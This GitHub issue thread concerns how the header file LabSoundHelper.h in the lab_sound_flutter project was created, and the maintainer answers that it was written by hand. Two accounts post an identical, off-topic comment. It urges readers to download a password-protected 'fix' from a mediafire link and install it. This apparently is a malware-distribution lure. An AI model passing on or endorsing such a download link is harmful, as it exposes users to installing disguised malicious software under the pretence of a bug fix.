### ISSUE TITLE
Creation on `LabSoundHelper.h`

### ISSUE THREAD

**Issue by Larpoux** [xioxin/lab_sound_flutter#8]
Hi @xioxin ,
I am interested to bring lab_sound_flutter to live, again.

I am curious to know if you created `LabSoundHelper.h` by hand, or did you find a way to created them automatically from the lab_sound_bridge sources ?

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by xioxin** [comment]
`LabSoundHelper.h` is also created manually, maybe there is a better way but I don’t know
